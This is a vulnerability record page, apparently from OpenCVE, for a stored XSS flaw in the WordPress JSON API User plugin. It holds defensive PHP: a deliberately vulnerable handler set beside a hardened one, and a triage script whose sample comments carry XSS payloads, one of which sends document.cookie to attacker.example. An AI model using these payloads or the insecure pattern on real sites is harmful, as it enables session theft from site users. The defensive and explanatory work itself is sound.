Description
The JSON API User plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'content' parameter of the post_comment API endpoint in versions up to, and including, 4.1.0. This is due to insufficient input sanitization in the post_comment() function, which passes the attacker-controlled comment_content value directly to wp_insert_comment() without applying any HTML sanitization, and additionally allows the caller to set comment_approved=1 to self-approve the comment and bypass moderation. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Published: 2026-07-03
Score: 6.4 Medium
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The JSON API User plugin for WordPress contains a stored cross-site scripting flaw in the post_comment() API endpoint. Attacker-controlled content passed through the 'content' parameter is handed to wp_insert_comment() without sanitization, and the caller can set comment_approved=1 so the comment is published immediately instead of waiting in the moderation queue. Any visitor or logged-in user who loads a page that renders the comment executes the injected script in the site's origin; against an administrator this can be used to steal cookies or session tokens, perform actions with their privileges, or alter page content.
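To make the defect concrete, the following is an added illustration written for this page, not the plugin's actual source: a handler built the way the description says post_comment() behaves, followed by a hardened version. It assumes the endpoint reads post_id, content and comment_approved from the request (every parameter name other than 'content' is an assumption) and that it runs inside WordPress, since wp_insert_comment(), wp_new_comment() and wp_kses() are WordPress core functions.

```php
<?php
// Added illustration for this page; NOT the JSON API User plugin's code.
// Assumes WordPress is loaded. Request parameter names other than 'content' are assumed.

// The pattern the advisory describes: raw 'content' and a caller-chosen
// 'comment_approved' go straight to wp_insert_comment(), which performs no
// HTML filtering and makes no moderation decision of its own.
function vulnerable_post_comment() {
    $user = wp_get_current_user();
    if ( ! $user->exists() ) {
        return array( 'error' => 'login required' );
    }
    $comment = array(
        'comment_post_ID'      => (int) ( $_REQUEST['post_id'] ?? 0 ),
        'comment_content'      => (string) ( $_REQUEST['content'] ?? '' ), // raw HTML/JS
        'comment_author'       => $user->display_name,
        'comment_author_email' => $user->user_email,
        'user_id'              => $user->ID,
        // The client decides whether its own comment is approved.
        'comment_approved'     => (int) ( $_REQUEST['comment_approved'] ?? 0 ),
    );
    $id = wp_insert_comment( $comment ); // no wp_filter_comment(), no wp_allow_comment()
    return array( 'comment_id' => $id );
}

// Hardened version: content is filtered against the comment allow-list and the
// approval state comes from the site's moderation settings, never from the caller.
function hardened_post_comment() {
    $user = wp_get_current_user();
    if ( ! $user->exists() ) {
        return array( 'error' => 'login required' );
    }
    $post_id = absint( $_REQUEST['post_id'] ?? 0 );
    if ( ! $post_id || ! get_post( $post_id ) || ! comments_open( $post_id ) ) {
        return array( 'error' => 'comments closed or post not found' );
    }
    // wp_unslash() undoes WordPress's request slashing; wp_kses() with the
    // default 'data' context keeps only the tags allowed in comments.
    $content = wp_kses(
        wp_unslash( (string) ( $_REQUEST['content'] ?? '' ) ),
        wp_kses_allowed_html( 'data' )
    );
    if ( '' === trim( $content ) ) {
        return array( 'error' => 'empty comment' );
    }
    $commentdata = array(
        'comment_post_ID'      => $post_id,
        'comment_content'      => $content,
        'comment_author'       => $user->display_name,
        'comment_author_email' => $user->user_email,
        'comment_author_url'   => '',
        'comment_type'         => 'comment',
        'user_id'              => $user->ID,
        // Deliberately no 'comment_approved': wp_new_comment() runs
        // wp_filter_comment() (kses for users without unfiltered_html) and
        // wp_allow_comment(), which applies the moderation and blocklist
        // settings and overrides anything the caller might have supplied.
    );
    $id = wp_new_comment( $commentdata, true ); // true: return WP_Error instead of wp_die()
    if ( is_wp_error( $id ) ) {
        return array( 'error' => $id->get_error_message() );
    }
    return array(
        'comment_id' => $id,
        'approved'   => get_comment( $id )->comment_approved, // '0' (pending) or '1'
    );
}
```

The two changes that matter are routing the insert through wp_new_comment() rather than wp_insert_comment(), so that kses filtering and the moderation decision happen server-side, and dropping comment_approved from the request entirely; the explicit wp_kses() call is belt-and-braces in case a later filter removes the default one.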

Affected Systems

The vulnerability affects every release of the JSON API User plugin by parorrey up to and including version 4.1.0. The OpenCVE analysis names 4.1.2 as the first fixed release, but the CVE record itself only states the affected range and links no vendor advisory, so confirm the fixed version against the plugin's changelog before treating an upgrade as remediation. Any WordPress site with the plugin active is exposed, whether or not the site itself uses the API to publish comments: the attacker calls the endpoint directly.

Risk and Exploitability

The flaw carries a CVSS 3.1 base score of 6.4 (Medium), vector AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N: reachable over the network, low complexity, requiring only an authenticated low-privilege account and no victim interaction, with a changed scope because the injected script runs in other users' browsers. EPSS data is not available and the vulnerability is not currently listed in CISA's KEV catalog. Because a subscriber account is enough, any site that allows open registration or hosts untrusted subscriber accounts meets the precondition; once a comment is inserted and self-approved, the payload executes on every view of the page that renders it until the comment is deleted or unapproved.

Generated by OpenCVE AI on July 3, 2026 at 13:01 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade the JSON API User plugin to a release newer than 4.1.0. The OpenCVE analysis names 4.1.2 as the fixed version; confirm this against the vendor changelog, since no vendor advisory is linked from this record.
  • Do not rely on WordPress comment moderation as a workaround: the endpoint passes the caller-supplied comment_approved=1 straight to wp_insert_comment(), which applies neither the moderation settings nor the comment content filters, so "Comment must be manually approved" does not stop a self-approved comment. Instead, keep untrusted users away from the endpoint, for example by disabling open registration, auditing existing subscriber accounts, or restricting the API route at the web server.
  • If the plugin is not essential to site functionality, disable or uninstall it to eliminate the vulnerability.
  • As a stop-gap, a web-application firewall rule on POST requests to the post_comment endpoint can block obvious payloads, but matching only on script tags is easy to evade (event-handler attributes, javascript: URLs, svg and other tags also execute script), so treat it as defense in depth rather than a fix, and review already-approved comments for injected markup.
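Because a "block script tags" rule misses most real payloads, the following is an added triage helper written for this page (not the plugin's or OpenCVE's code) that flags already-approved comments whose body carries markup outside the comment allow-list: disallowed tags, event-handler attributes, or scriptable URL schemes. The allow-list is modelled on WordPress's default comment tag set and is an assumption; the sample rows, the attacker.example hostname and the 'role' column (which would come from a join against wp_usermeta) are constructed for the example. It runs stand-alone without WordPress.

```php
<?php
// Added triage helper for this page; not the plugin's code. Runs stand-alone (no WordPress needed).
// Allow-list modelled on WordPress's default comment tag set; treat it as an assumption.
const COMMENT_ALLOWED_TAGS = array(
    'a', 'abbr', 'acronym', 'b', 'blockquote', 'cite', 'code', 'del',
    'em', 'i', 'q', 's', 'strike', 'strong',
);

// Returns the reasons a comment body looks like it bypassed comment kses; empty if clean.
function suspicious_markup_reasons( string $content ): array {
    $reasons = array();
    // Any tag outside the comment allow-list (script, img, svg, iframe, style, ...).
    if ( preg_match_all( '/<\s*\/?\s*([a-zA-Z][a-zA-Z0-9]*)/', $content, $m ) ) {
        foreach ( array_unique( array_map( 'strtolower', $m[1] ) ) as $tag ) {
            if ( ! in_array( $tag, COMMENT_ALLOWED_TAGS, true ) ) {
                $reasons[] = "disallowed tag <$tag>";
            }
        }
    }
    // Event-handler attributes survive a naive "<script" WAF rule.
    if ( preg_match( '/\bon[a-zA-Z]+\s*=/', $content ) ) {
        $reasons[] = 'event handler attribute';
    }
    // javascript: or data: URLs inside otherwise-allowed tags such as <a href>.
    if ( preg_match( '/\b(?:href|src|action|formaction)\s*=\s*["\']?\s*(?:javascript|data)\s*:/i', $content ) ) {
        $reasons[] = 'scriptable URL scheme';
    }
    return $reasons;
}

// $rows: associative arrays shaped like wp_comments rows plus a 'role' column.
// Only approved comments from non-privileged authors are interesting; an
// administrator or editor holds unfiltered_html and may legitimately post raw HTML.
function triage_comments( array $rows ): array {
    $flagged = array();
    foreach ( $rows as $row ) {
        if ( '1' !== (string) $row['comment_approved'] ) {
            continue;
        }
        if ( in_array( $row['role'], array( 'administrator', 'editor' ), true ) ) {
            continue;
        }
        $reasons = suspicious_markup_reasons( $row['comment_content'] );
        if ( $reasons ) {
            $flagged[ (int) $row['comment_ID'] ] = $reasons;
        }
    }
    return $flagged;
}

// Constructed sample rows (not real data). In practice pull approved comments
// from wp_comments and resolve each author's role from wp_usermeta
// (meta_key 'wp_capabilities') before handing them to triage_comments().
$sample = array(
    array( 'comment_ID' => 101, 'comment_approved' => '1', 'role' => 'subscriber',
           'comment_content' => 'Great post, see <a href="https://example.com">this</a>' ),
    array( 'comment_ID' => 102, 'comment_approved' => '1', 'role' => 'subscriber',
           'comment_content' => '<img src=x onerror="fetch(\'//attacker.example/\'+document.cookie)">' ),
    array( 'comment_ID' => 103, 'comment_approved' => '1', 'role' => 'subscriber',
           'comment_content' => '<a href="javascript:alert(document.domain)">click</a>' ),
    array( 'comment_ID' => 104, 'comment_approved' => '0', 'role' => 'subscriber',
           'comment_content' => '<script>alert(1)</script>' ),
    array( 'comment_ID' => 105, 'comment_approved' => '1', 'role' => 'administrator',
           'comment_content' => '<iframe src="https://example.com/embed"></iframe>' ),
);

foreach ( triage_comments( $sample ) as $id => $reasons ) {
    echo "comment $id: " . implode( ', ', $reasons ) . "\n";
}
```

Run against the sample, the helper reports 102 (disallowed img tag plus an event handler) and 103 (javascript: URL), skips 104 because it never left the moderation queue, and skips 105 because an administrator is allowed raw HTML. A hit on an approved subscriber comment dated after the plugin was installed is a strong indicator that the endpoint has already been abused.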

Advisories

No advisories yet.

History

Fri, 03 Jul 2026 08:00:00 +0000

Type: First Time appeared
  Values Removed: (none)
  Values Added: Parorrey; Parorrey json Api User; Wordpress; Wordpress wordpress
Type: Vendors & Products
  Values Removed: (none)
  Values Added: Parorrey; Parorrey json Api User; Wordpress; Wordpress wordpress

Fri, 03 Jul 2026 05:30:00 +0000

Type: Description
  Values Added: (identical to the Description at the top of this page)
Type: Title
  Values Added: JSON API User <= 4.1.0 - Authenticated (Subscriber+) Stored Cross-Site Scripting via 'content' Parameter
Type: Weaknesses
  Values Added: CWE-79
Type: References
  Values Added: (none listed)
Type: Metrics
  Values Added: cvssV3_1, score 6.4, vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N


MITRE

Status: PUBLISHED

Assigner: Wordfence

Published:

Updated: 2026-07-03T04:30:19.039Z

Reserved: 2026-05-26T17:20:23.199Z

Link: CVE-2026-9626

Vulnrichment

No data.

NVD

No data.

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-07-03T13:15:12Z

Weaknesses
  • CWE-79

    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')